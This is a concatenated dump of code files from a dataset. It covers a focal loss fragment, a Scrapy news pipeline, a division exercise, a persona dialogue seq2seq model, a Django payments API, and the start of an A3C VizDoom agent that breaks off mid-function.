py_sigmoid_focal_loss(\r\n pred,\r\n target,\r\n weight,\r\n gamma=self.gamma,\r\n alpha=self.alpha,\r\n reduction=reduction,\r\n avg_factor=avg_factor)\r\n else:\r\n raise NotImplementedError\r\n return loss_cls\r\n","sub_path":"models/losses/focal_loss.py","file_name":"focal_loss.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554630014","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\nimport json\nfrom oldsinanews.config import BASE_PATH, RESULT_PATH\nfrom scrapy.exceptions import DropItem\nimport dateutil.parser as dparser\n\n\nclass OldsinanewsPipeline(object):\n def process_item(self, item, spider):\n if item['news_id']:\n datetime_file_path = os.path.join(RESULT_PATH, item['news_time'])\n if not os.path.exists(datetime_file_path):\n os.mkdir(datetime_file_path)\n with open('%s/%s.html' % (datetime_file_path, item['news_id']), 'wb') as f:\n f.write(item['news_html'])\n datetime_json_file_path = os.path.join(datetime_file_path, 'json_result')\n if not os.path.exists(datetime_json_file_path):\n os.mkdir(datetime_json_file_path)\n json_result = {'news_id': item['news_id'], 'news_type': item['news_type'],\n 'news_title': item['news_title'],\n 'news_url': item['news_url'], 'news_time': item['news_time'],\n 'news_content': item['news_content']}\n with open('%s/%s.json' % (datetime_json_file_path, item['news_id']), 'w', encoding='utf8') as f:\n f.write(json.dumps(json_result, sort_keys=True, indent=4, ensure_ascii=False))\n else:\n raise DropItem(\"Missing title in %s\" % item)\n\n","sub_path":"oldsinanews/oldsinanews/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125762045","text":"\"\"\"\r\n1. Реализовать функцию, принимающую два числа (позиционные аргументы) и выполняющую их деление.\r\nЧисла запрашивать у пользователя, предусмотреть обработку ситуации деления на ноль.\r\n\"\"\"\r\n\r\n\r\ndef quotient(divisible, divisor):\r\n \"\"\"\r\n Функция quotient() выполняет деление чиел, вводимых пользователем.\r\n divisible - делимое\r\n divisor - делитель\r\n В случае деления на ноль выводится текстовое сообщение об ошибке\r\n \"\"\"\r\n try:\r\n result = divisible / divisor\r\n except ZeroDivisionError:\r\n result = \"Ошибка. Деление на 0\"\r\n except ValueError:\r\n result = \"Ошибка ввода ValueError\"\r\n finally:\r\n return print(result)\r\n\r\narg_1 = float(input(\"Введите делимое:\\n\"))\r\narg_2 = float(input(\"Введите делитель:\\n\"))\r\n\r\nquotient(arg_1, arg_2)\r\n\r\n","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122296380","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport os\nimport time\nimport sys\nfrom tensorflow.python.ops import variable_scope\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom . import decoder_fn_lib\nimport numpy as np\nimport re\nfrom . import utils\nfrom .utils import sample_gaussian, gaussian_kld, norm_log_liklihood, get_bow, get_rnn_encode, get_bi_rnn_encode, get_idf\n\nimport tensorboardX as tb\nimport tensorboardX.summary\nimport tensorboardX.writer\n\nfrom .cvae import BaseTFModel\n\nclass S2Smemory(BaseTFModel):\n '''\n Sequence-to-sequence baseline with attention for persona generation dataset, with/without\n pfofiles.\n When using profiles, we will use attention memory together with the input\n '''\n def __init__(self, config, api, log_dir, scope=None):\n super(S2Smemory, self).__init__()\n self.use_profile = config.use_profile\n self.vocab = api.vocab\n self.rev_vocab = api.rev_vocab\n self.vocab_size = len(self.vocab)\n\n self.scope = scope\n self.max_utt_len = config.max_utt_len\n self.go_id = self.rev_vocab[\"<s>\"]\n self.eos_id = self.rev_vocab[\"</s>\"]\n self.context_cell_size = config.cxt_cell_size\n self.sent_cell_size = config.sent_cell_size\n self.dec_cell_size = config.dec_cell_size\n\n self.embed_size = config.embed_size\n self.sent_type = config.sent_type\n self.keep_prob = config.keep_prob\n self.num_layer = config.num_layer\n self.dec_keep_prob = config.dec_keep_prob\n self.full_kl_step = config.full_kl_step\n self.grad_clip = config.grad_clip\n self.grad_noise = config.grad_noise\n\n # self.embedding = nn.Embedding(self.vocab_size, self.embed_size, padding_idx=0)\n # # self.idxembedding = nn.Embedding(self.vocab_size, 1)\n # #\n # # self.embedding.weight.require_grad = False\n # # self.idxembedding.weight.require_grad = False\n self.embedding = nn.Embedding.from_pretrained(torch.from_numpy(np.array(api.word2vec, dtype='float32')))\n self.idxembedding = nn.Embedding.from_pretrained(torch.from_numpy(np.array(api.word2idx, dtype='float32')).unsqueeze(1))\n\n # no dropout at last layer, we need to add one\n if self.sent_type == \"bow\":\n input_embedding_size = output_embedding_size = self.embed_size\n elif self.sent_type == \"rnn\":\n self.sent_cell = self.get_rnncell(\"gru\", self.embed_size, self.sent_cell_size, self.keep_prob, 1)\n input_embedding_size = output_embedding_size = self.sent_cell_size\n elif self.sent_type == \"bi_rnn\":\n self.bi_sent_cell = self.get_rnncell(\"gru\", self.embed_size, self.sent_cell_size, keep_prob=1.0, num_layer=1, bidirectional=True)\n input_embedding_size = output_embedding_size = self.sent_cell_size * 2\n\n # embedding + 1/0 identify encoding\n joint_embedding_size = input_embedding_size + 2\n\n self.enc_cell = self.get_rnncell(config.cell_type, joint_embedding_size, self.context_cell_size, keep_prob=1.0, num_layer=config.num_layer)\n cond_embedding_size = config.topic_embed_size + self.context_cell_size\n\n dec_inputs_size = cond_embedding_size\n\n # Decoder\n if config.num_layer > 1:\n self.dec_init_state_net = nn.ModuleList(\n [nn.Linear(dec_inputs_size, self.dec_cell_size) for i in range(config.num_layer)])\n else:\n self.dec_init_state_net = nn.Sequential(nn.Linear(dec_inputs_size, self.dec_cell_size), nn.Tanh())\n\n # decoder\n dec_input_embedding_size = self.embed_size if not self.use_profile else self.embed_size + input_embedding_size\n\n self.dec_cell = self.get_rnncell(config.cell_type, dec_input_embedding_size, self.dec_cell_size,\n config.keep_prob, config.num_layer)\n self.dec_cell_proj = nn.Linear(self.dec_cell_size, self.vocab_size)\n self.atten_proj = nn.Linear(input_embedding_size, self.dec_cell_size)\n\n self.build_optimizer(config, log_dir)\n\n # initilize learning rate\n self.learning_rate = config.init_lr\n with tf.name_scope(\"io\"):\n # all dialog context and known attributes\n self.input_contexts = tf.placeholder(dtype=tf.int32, shape=(None, None, self.max_utt_len), name=\"dialog_context\")\n self.context_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"context_lens\")\n self.profile_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"profile_lens\")\n #self.my_profile = tf.placeholder(dtype=tf.float32, shape=(None, 4), name=\"my_profile\")\n #self.ot_profile = tf.placeholder(dtype=tf.float32, shape=(None, 4), name=\"ot_profile\")\n\n # target response given the dialog context\n self.output_tokens = tf.placeholder(dtype=tf.int32, shape=(None, None), name=\"output_token\")\n self.output_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"output_lens\")\n\n # optimization related variables\n self.global_t = tf.placeholder(dtype=tf.int32, name=\"global_t\")\n self.use_prior = tf.placeholder(dtype=tf.bool, name=\"use_prior\")\n\n def forward(self, feed_dict, use_profile=False, mode='train'):\n for k, v in feed_dict.items():\n setattr(self, k, v)\n\n max_dialog_len = self.input_contexts.size(1)\n if use_profile:\n max_profile_len = self.profile_contexts.size(1)\n\n with variable_scope.variable_scope(\"wordEmbedding\"):\n self.input_contexts = self.input_contexts.view(-1, self.max_utt_len)\n input_embedding = self.embedding(self.input_contexts)\n if use_profile:\n profile_mask = (self.profile_contexts.sum(-1) != 0).float()\n self.profile_contexts = self.profile_contexts.view(-1, self.max_utt_len)\n profile_embedding = self.embedding(self.profile_contexts)\n\n if self.sent_type == \"bow\":\n input_embedding, sent_size = get_bow(input_embedding)\n if use_profile:\n profile_embedding, p_sent_size = get_bow(profile_embedding)\n\n elif self.sent_type == \"rnn\":\n input_embedding, sent_size = get_rnn_encode(input_embedding, self.sent_cell, self.keep_prob,\n scope=\"sent_rnn\")\n if use_profile:\n profile_embedding, p_sent_size = get_rnn_encode(profile_embedding, self.sent_cell,\n self.keep_prob, scope=\"sent_rnn\")\n elif self.sent_type == \"bi_rnn\":\n input_embedding, sent_size = get_bi_rnn_encode(input_embedding, self.bi_sent_cell,\n scope=\"sent_bi_rnn\")\n if use_profile:\n profile_embedding, p_sent_size = get_bi_rnn_encode(profile_embedding, self.bi_sent_cell,\n scope=\"sent_bi_rnn\")\n else:\n raise ValueError(\"Unknown sent_type. Must be one of [bow, rnn, bi_rnn]\")\n\n # reshape input into dialogs\n input_embedding = input_embedding.view(-1, max_dialog_len, sent_size)\n if use_profile:\n profile_embedding = profile_embedding.view(-1, max_profile_len, p_sent_size)\n if self.keep_prob < 1.0:\n input_embedding = F.dropout(input_embedding, 1 - self.keep_prob, self.training)\n\n # convert floors into 1 hot\n floor_one_hot = self.floors.new_zeros((self.floors.numel(), 2), dtype=torch.float)\n floor_one_hot.data.scatter_(1, self.floors.view(-1, 1), 1)\n floor_one_hot = floor_one_hot.view(-1, max_dialog_len, 2)\n joint_embedding_input = torch.cat([input_embedding, floor_one_hot], 2)\n\n # self.input_contexts = self.input_contexts.view(-1, self.max_utt_len)\n # input_embedding = self.embedding(self.input_contexts)\n # if self.sent_type == \"bow\":\n # input_embedding, sent_size = get_bow(input_embedding)\n # elif self.sent_type == \"rnn\":\n # input_embedding, sent_size = get_rnn_encode(input_embedding, self.sent_cell, self.keep_prob, scope=\"sent_rnn\")\n # elif self.sent_type == \"bi_rnn\":\n # input_embedding, sent_size = get_bi_rnn_encode(input_embedding, self.bi_sent_cell, scope=\"sent_bi_rnn\")\n # else:\n # raise ValueError(\"Unknown sent_type. Must be one of [bow, rnn, bi_rnn]\")\n # # reshape input into dialogs\n # input_embedding = input_embedding.view(-1, max_dialog_len, sent_size)\n # if use_profile:\n # profile_mask = (self.profile_contexts.sum(-1) != 0).float()\n # self.profile_contexts = self.profile_contexts.view(-1, self.max_utt_len)\n # profile_embedding = self.embedding(self.profile_contexts)\n # profile_idx = self.idxembedding(self.profile_contexts)\n # profile_embedding, p_sent_size = get_idf(profile_embedding, profile_idx)\n # profile_embedding = profile_embedding.view(-1, max_profile_len, p_sent_size)\n # if self.keep_prob < 1.0:\n # input_embedding = F.dropout(input_embedding, 1 - self.keep_prob, self.training)\n #\n # # convert floors into 1 hot\n # floor_one_hot = self.floors.new_zeros((self.floors.numel(), 2), dtype=torch.float)\n # floor_one_hot.data.scatter_(1, self.floors.view(-1,1), 1)\n # floor_one_hot = floor_one_hot.view(-1, max_dialog_len, 2)\n # joint_embedding_input = torch.cat([input_embedding, floor_one_hot], 2)\n\n with variable_scope.variable_scope(\"contextRNN\"):\n # and enc_last_state will be same as the true last state\n # self.enc_cell.eval()\n _, enc_last_state = utils.dynamic_rnn(\n self.enc_cell,\n joint_embedding_input,\n sequence_length=self.context_lens)\n\n if self.num_layer > 1:\n enc_last_state = torch.cat([_ for _ in torch.unbind(enc_last_state)], 1)\n else:\n enc_last_state = enc_last_state.squeeze(0)\n\n with variable_scope.variable_scope(\"generationNetwork\"):\n dec_inputs = enc_last_state\n\n # Decoder\n if self.num_layer > 1:\n dec_init_state = [self.dec_init_state_net[i](dec_inputs) for i in range(self.num_layer)]\n dec_init_state = torch.stack(dec_init_state)\n else:\n dec_init_state = self.dec_init_state_net(dec_inputs).unsqueeze(0)\n\n with variable_scope.variable_scope(\"decoder\"):\n if mode == 'test':\n dec_outs, _, final_context_state = decoder_fn_lib.inference_loop(self.dec_cell, self.dec_cell_proj, self.embedding,\n encoder_state = dec_init_state,\n start_of_sequence_id=self.go_id,\n end_of_sequence_id=self.eos_id,\n maximum_length=self.max_utt_len,\n num_decoder_symbols=self.vocab_size,\n context_vector=None,\n decode_type='greedy')\n else:\n # loop_func = decoder_fn_lib.context_decoder_fn_train(dec_init_state, selected_attribute_embedding)\n # apply word dropping. Set dropped word to 0\n input_tokens = self.output_tokens[:, :-1]\n if self.dec_keep_prob < 1.0:\n # if token is 0, then embedding is 0, it's the same as word drop\n keep_mask = input_tokens.new_empty(input_tokens.size()).bernoulli_(config.dec_keep_prob)\n input_tokens = input_tokens * keep_mask\n\n dec_input_embedding = self.embedding(input_tokens)\n dec_seq_lens = self.output_lens - 1\n\n # Apply embedding dropout\n dec_input_embedding = F.dropout(dec_input_embedding, 1 - self.keep_prob, self.training)\n\n dec_outs, _, final_context_state = decoder_fn_lib.train_attention_loop(self.dec_cell, \n self.dec_cell_proj, \n dec_input_embedding,\n atten_fn=self.atten_proj,\n init_state=dec_init_state, \n context_vector=profile_embedding, \n max_length=max_dialog_len,\n atten_mask=profile_mask)\n\n if final_context_state is not None:\n self.dec_out_words = final_context_state\n else:\n self.dec_out_words = torch.max(dec_outs, 2)[1]\n\n if not mode == 'test':\n with variable_scope.variable_scope(\"loss\"):\n labels = self.output_tokens[:, 1:]\n label_mask = torch.sign(labels).detach().float()\n\n # rc_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=dec_outs, labels=labels)\n rc_loss = F.cross_entropy(dec_outs.view(-1, dec_outs.size(-1)), labels.reshape(-1), reduction='none').view(\n dec_outs.size()[:-1])\n # print(rc_loss * label_mask)\n rc_loss = torch.sum(rc_loss * label_mask, 1)\n self.avg_rc_loss = rc_loss.mean()\n # used only for perpliexty calculation. Not used for optimzation\n self.rc_ppl = torch.exp(torch.sum(rc_loss) / torch.sum(label_mask))\n\n self.summary_op = [ \\\n tb.summary.scalar(\"model/loss/rc_loss\", self.avg_rc_loss.item())]\n\n # self.log_p_z = norm_log_liklihood(latent_sample, prior_mu, prior_logvar)\n # self.log_q_z_xy = norm_log_liklihood(latent_sample, recog_mu, recog_logvar)\n # self.est_marginal = torch.mean(rc_loss + bow_loss - self.log_p_z + self.log_q_z_xy)\n\n def batch_2_feed(self, batch, global_t, use_prior, repeat=1):\n context, context_lens, floors, topics, my_profiles, ot_profiles, outputs, output_lens, output_das, p_context, p_lens = batch\n feed_dict = {\"input_contexts\": context, \"context_lens\":context_lens,\n \"floors\": floors, \"topics\":topics, \"my_profile\": my_profiles,\n \"ot_profile\": ot_profiles, \"output_tokens\": outputs,\n \"output_das\": output_das, \"output_lens\": output_lens,\n \"use_prior\": use_prior, \"profile_contexts\": p_context, \"profile_lens\":p_lens}\n if repeat > 1:\n tiled_feed_dict = {}\n for key, val in feed_dict.items():\n if key == \"use_prior\":\n tiled_feed_dict[key] = val\n continue\n multipliers = [1]*len(val.shape)\n multipliers[0] = repeat\n tiled_feed_dict[key] = np.tile(val, multipliers)\n feed_dict = tiled_feed_dict\n\n if global_t is not None:\n feed_dict[\"global_t\"] = global_t\n\n if torch.cuda.is_available():\n feed_dict = {k: torch.from_numpy(v).cuda() if isinstance(v, np.ndarray) else v for k, v in feed_dict.items()}\n else:\n feed_dict = {k: torch.from_numpy(v) if isinstance(v, np.ndarray) else v for k, v in feed_dict.items()}\n\n return feed_dict\n\n def train_model(self, global_t, train_feed, update_limit=5000, use_profile=False):\n rc_losses = []\n rc_ppls = []\n local_t = 0\n start_time = time.time()\n loss_names = [\"rc_loss\", \"rc_peplexity\"]\n while True:\n batch = train_feed.next_batch()\n if batch is None:\n break\n if update_limit is not None and local_t >= update_limit:\n break\n feed_dict = self.batch_2_feed(batch, global_t, use_prior=False)\n self.forward(feed_dict, use_profile=use_profile, mode='train')\n rc_loss, rc_ppl = self.avg_rc_loss.item(), self.rc_ppl.item()\n\n self.optimize(self.avg_rc_loss)\n # print(elbo_loss, bow_loss, rc_loss, rc_ppl, kl_loss)\n for summary in self.summary_op:\n self.train_summary_writer.add_summary(summary, global_t)\n rc_ppls.append(rc_ppl)\n rc_losses.append(rc_loss)\n\n global_t += 1\n local_t += 1\n if local_t % (train_feed.num_batch // 10) == 0:\n kl_w = 0\n self.print_loss(\"%.2f\" % (train_feed.ptr / float(train_feed.num_batch)),\n loss_names, [rc_losses, rc_ppls], \"kl_w %f\" % kl_w)\n\n # finish epoch!\n torch.cuda.synchronize()\n epoch_time = time.time() - start_time\n avg_losses = self.print_loss(\"Epoch Done\", loss_names,\n [rc_losses, rc_ppls],\n \"step time %.4f\" % (epoch_time / train_feed.num_batch))\n\n return global_t, avg_losses[0]\n\n def valid_model(self, name, valid_feed, use_profile=False):\n rc_losses = []\n rc_ppls = []\n\n while True:\n batch = valid_feed.next_batch()\n if batch is None:\n break\n feed_dict = self.batch_2_feed(batch, None, use_prior=False, repeat=1)\n with torch.no_grad():\n self.forward(feed_dict, use_profile=use_profile, mode='valid')\n rc_loss, rc_ppl = self.avg_rc_loss.item(), self.rc_ppl.item()\n rc_losses.append(rc_loss)\n rc_ppls.append(rc_ppl)\n\n\n avg_losses = self.print_loss(name, [\"rc_loss\", \"rc_peplexity\"],\n [rc_losses, rc_ppls], \"\")\n return avg_losses, [\"rc_loss\", \"rc_peplexity\"]\n\n def test_model(self, test_feed, num_batch=None, repeat=5, dest=sys.stdout, use_profile=False):\n local_t = 0\n recall_bleus = []\n prec_bleus = []\n\n while True:\n batch = test_feed.next_batch()\n if batch is None or (num_batch is not None and local_t > num_batch):\n break\n feed_dict = self.batch_2_feed(batch, None, use_prior=True, repeat=1)\n with torch.no_grad():\n self.forward(feed_dict, mode='test', use_profile=use_profile)\n word_outs = self.dec_out_words.cpu().numpy()\n sample_words = word_outs #np.split(word_outs, repeat, axis=0)\n\n true_floor = feed_dict[\"floors\"].cpu().numpy()\n true_srcs = feed_dict[\"input_contexts\"].cpu().numpy()\n true_src_lens = feed_dict[\"context_lens\"].cpu().numpy()\n true_outs = feed_dict[\"output_tokens\"].cpu().numpy()\n profile = feed_dict[\"profile_contexts\"].cpu().numpy()\n #true_topics = feed_dict[\"topics\"].cpu().numpy()\n #true_das = feed_dict[\"output_das\"].cpu().numpy()\n local_t += 1\n\n if dest != sys.stdout:\n if local_t % (test_feed.num_batch // 10) == 0:\n print(\"%.2f >> \" % (test_feed.ptr / float(test_feed.num_batch))),\n\n for b_id in range(test_feed.batch_size):\n # print the dialog context\n start = np.maximum(0, true_src_lens[b_id]-5)\n for t_id in range(start, true_srcs.shape[1], 1):\n src_str = \" \".join([self.vocab[e] for e in true_srcs[b_id, t_id].tolist() if e != 0])\n dest.write(\"Src %d-%d: %s\\n\" % (t_id, true_floor[b_id, t_id], src_str))\n for p_id in range(profile.shape[1]):\n profile_str = \" \".join([self.vocab[e] for e in profile[b_id, p_id].tolist() if e != 0])\n dest.write(\"Profile %d-%d: %s\\n\" % (p_id, 1, profile_str))\n # print the true outputs\n true_tokens = [self.vocab[e] for e in true_outs[b_id].tolist() if e not in [0, self.eos_id, self.go_id]]\n true_str = \" \".join(true_tokens).replace(\" ' \", \"'\")\n #da_str = self.da_vocab[true_das[b_id]]\n # print the predicted outputs\n dest.write(\"Target >> %s\\n\" % ( true_str))\n local_tokens = []\n\n pred_outs = sample_words\n #pred_da = np.argmax(sample_das[r_id], axis=1)[0]\n pred_tokens = [self.vocab[e] for e in pred_outs[b_id].tolist() if e != self.eos_id and e != 0]\n pred_str = \" \".join(pred_tokens).replace(\" ' \", \"'\")\n dest.write(\"Sample %d >> %s\\n\" % (0, pred_str))\n local_tokens.append(pred_tokens)\n\n max_bleu, avg_bleu = utils.get_bleu_stats(true_tokens, local_tokens)\n recall_bleus.append(max_bleu)\n prec_bleus.append(avg_bleu)\n # make a new line for better readability\n dest.write(\"\\n\")\n\n avg_recall_bleu = float(np.mean(recall_bleus))\n avg_prec_bleu = float(np.mean(prec_bleus))\n avg_f1 = 2*(avg_prec_bleu*avg_recall_bleu) / (avg_prec_bleu+avg_recall_bleu+10e-12)\n report = \"Avg recall BLEU %f, avg precision BLEU %f and F1 %f (only 1 reference response. Not final result)\" \\\n % (avg_recall_bleu, avg_prec_bleu, avg_f1)\n print(report)\n dest.write(report + \"\\n\")\n print(\"Done testing\")\n","sub_path":"models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":22374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106005640","text":"from payments.serializers import *\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.db import transaction\nimport coreapi\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework import renderers, response\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\n\n\nclass Accounts(APIView):\n def get(self, request, format=None):\n \"\"\"\n List all accounts\n\n Use this method to retrieve a list of all accounts in the database including their attributes.\n \"\"\"\n accounts = Account.objects.all()\n serializer = AccountSerializer(accounts, many=True)\n return Response(serializer.data)\n\n\nclass Payments(APIView):\n def get(self, request, format=None):\n \"\"\"\n List all payments\n\n Use this method to retrieve a list of all payments in the database including their attributes.\n \"\"\"\n payments = Payment.objects.all()\n serializer = PaymentSerializer(payments, many=True)\n return Response(serializer.data)\n\n\n @transaction.atomic\n def post(self, request, format=None):\n \"\"\"\n Create a new payment\n\n Use this method to create a new payment in the database. This method uses the PaymentSerializer which performs\n the validation prior to saving. This method is run as a Transaction to avoid race conditions, for example, if\n there are two debits on an account with low balance at the same time, the transaction will lock the tables\n and only validate each transaction if the account balance is high enough, among other checks.\n\n Inputs\n to_account: the id of thh destination account\n from_account: the id of the origin account\n amount: the amount, in the account's currency, to transfer\n \"\"\"\n serializer = PaymentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# This schema documentation can most certainly be done better, but for now..\nschema = coreapi.Document(\n title='QuickPay Sample Project API',\n content={\n 'accounts': coreapi.Link(\n url='/accounts/',\n action='get',\n fields=[],\n description='Return list of all accounts.'\n ),\n 'payments-get': coreapi.Link(\n url='/payments/',\n action='get',\n fields=[],\n description='Return list of all payments.'\n ),\n 'payments-post': coreapi.Link(\n url='/payments/',\n action='post',\n fields=[\n coreapi.Field(\n name='from_account',\n description='Account ID of the origin account (string)',\n required=True\n ),\n coreapi.Field(\n name='to_account',\n description='Account ID of the destination account (string)',\n required=True\n ),\n coreapi.Field(\n name='amount',\n description='Decimal amount of the transfer (decimal)',\n required=True\n )\n ],\n description='Submit a new payment.'\n )\n }\n)\n\n\n@api_view()\n@renderer_classes([OpenAPIRenderer, SwaggerUIRenderer, renderers.CoreJSONRenderer])\ndef schema_view(request):\n \"\"\"\n Generate the schema documentation page\n\n This method uses the schema definition defined above and generates the Swagger UI.\n \"\"\"\n return response.Response(schema)","sub_path":"payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"372595229","text":"import threading\nimport multiprocessing\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport scipy.signal\nimport skimage\nfrom skimage import transform\n\nfrom helper import *\nfrom vizdoom import *\n\nfrom random import choice\nfrom time import sleep\nfrom time import time\nimport os\n\ndef make_gif(images, fname, duration=2, true_image=False,salience=False,salIMGS=None):\n import moviepy.editor as mpy\n \n def make_frame(t):\n try:\n x = images[int(len(images)/duration*t)]\n except:\n x = images[-1]\n\n if true_image:\n return x.astype(np.uint8)\n else:\n return ((x+1)/2*255).astype(np.uint8)\n \n def make_mask(t):\n try:\n x = salIMGS[int(len(salIMGS)/duration*t)]\n except:\n x = salIMGS[-1]\n return x\n\n clip = mpy.VideoClip(make_frame, duration=duration)\n if salience == True:\n mask = mpy.VideoClip(make_mask, ismask=True,duration= duration)\n clipB = clip.set_mask(mask)\n clipB = clip.set_opacity(0)\n mask = mask.set_opacity(0.1)\n mask.write_gif(fname, fps = len(images) / duration,verbose=False)\n #clipB.write_gif(fname, fps = len(images) / duration,verbose=False)\n else:\n clip.write_gif(fname, fps = len(images) / duration,verbose=False)\n\ndef update_target_graph(from_scope, to_scope):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(from_var))\n return op_holder\n\ndef process_frame(frame):\n s = frame[10:-10, 30:-30]\n s = transform.resize(s,[84,84])\n s = np.reshape(s, [np.prod(s.shape)])/255.0\n return s\n\ndef discount(x, gamma):\n return scipy.signal.lfilter([1], [1, -gamma], x[::1], axis=0)[::-1]\n\ndef normalized_columns_initializer(std=1.0):\n def _initializer(shape, dtype=None, partition_info=None):\n out = np.random.randn(*shape).astype(np.float32)\n out *= std/np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n return tf.constant(out)\n return _initializer\n\nclass ACNetwork():\n def __init__(self, s_size, a_size, scope, trainer):\n with tf.variable_scope(scope):\n self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)\n self.imageIn = tf.reshape(self.inputs, shape=[-1, 84, 84, 1])\n \n self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,\n inputs=self.imageIn, \n num_outputs=16,\n kernel_size=[8,8],\n stride=[4,4],\n weights_initializer='random_uniform',\n padding='VALID')\n\n self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,\n inputs=self.conv1, \n num_outputs=32,\n kernel_size=[4,4],\n stride=[2,2],\n weights_initializer='random_uniform',\n padding='VALID')\n\n hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu,\n weights_initializer='random_uniform')\n\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)\n c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)\n h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)\n self.state_init = [c_init, h_init]\n c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])\n h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])\n self.state_in = (c_in, h_in)\n rnn_in = tf.expand_dims(hidden, [0])\n step_size = tf.shape(self.imageIn)[:1]\n state_in = tf.contrib.rnn.LSTMStateTuple(c_in,h_in)\n lstm_outputs, lstm_state = tf.nn.dynamic_rnn(\n lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,\n time_major=False)\n lstm_c, lstm_h = lstm_state\n self.state_out = (lstm_c[:1, :], lstm_h[:1, :])\n rnn_out = tf.reshape(lstm_outputs, [-1, 256])\n\n self.policy = slim.fully_connected(rnn_out,\n a_size,\n activation_fn=tf.nn.softmax,\n weights_initializer=normalized_columns_initializer(0.01),\n biases_initializer=None)\n self.value = slim.fully_connected(rnn_out,\n 1,\n activation_fn=None,\n weights_initializer=normalized_columns_initializer(1.0),\n biases_initializer=None)\n\n if scope != 'global':\n self.actions = tf.placeholder(shape=[None], dtype=tf.int32)\n self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)\n self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)\n self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)\n\n self.responsible_outputs = (tf.reduce_sum(self.policy*self.actions_onehot, [1]))\n \n self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))\n self.entropy = -tf.reduce_sum(self.policy*tf.log(self.policy))\n self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)\n self.loss =0.5*self.value_loss + self.policy_loss - self.entropy * 0.01\n\n local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)\n self.gradients = tf.gradients(self.loss, local_vars)\n self.var_norms = tf.global_norm(local_vars)\n grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)\n\n global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')\n self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))\n\nclass Worker():\n def __init__(self, game, name, s_size, a_size, trainer, model_path, global_episodes):\n self.name = \"worker_\" + str(name)\n self.number = name\n self.model_path = model_path\n self.trainer = trainer\n self.global_episodes = global_episodes\n self.increment = self.global_episodes.assign_add(1)\n self.episode_rewards = []\n self.episode_lengths = []\n self.episode_mean_values = []\n self.summary_writer = tf.summary.FileWriter(\"train_\"+str(self.number))\n\n self.localac = ACNetwork(s_size, a_size, self.name, trainer)\n self.update_local_ops = update_target_graph('gobal', self.name)\n \n game.set_doom_scenario_path(\"basic.wad\")\n game.set_doom_map(\"map01\")\n game.set_screen_resolution(ScreenResolution.RES_160X120)\n game.set_screen_format(ScreenFormat.GRAY8)\n game.set_render_hud(False)\n game.set_render_crosshair(False)\n game.set_render_weapon(True)\n game.set_render_decals(False)\n game.set_render_particles(False)\n game.add_available_button(Button.MOVE_LEFT)\n game.add_available_button(Button.MOVE_RIGHT)\n game.add_available_button(Button.ATTACK)\n game.add_available_game_variable(GameVariable.AMMO2)\n game.add_available_game_variable(GameVariable.POSITION_X)\n game.add_available_game_variable(GameVariable.POSITION_Y)\n game.set_episode_timeout(300)\n game.set_episode_start_time(10)\n game.set_window_visible(False)\n game.set_sound_enabled(False)\n game.set_living_reward(-1)\n game.set_mode(Mode.PLAYER)\n game.init()\n self.actions = self.actions = np.identity(a_size, dtype=bool).tolist()\n\n self.env = game\n\n def train(self, rollout, sess, gamma, bootstrap_value):\n rollout = np.array(rollout)\n observations = rollout[:,0]\n actions = 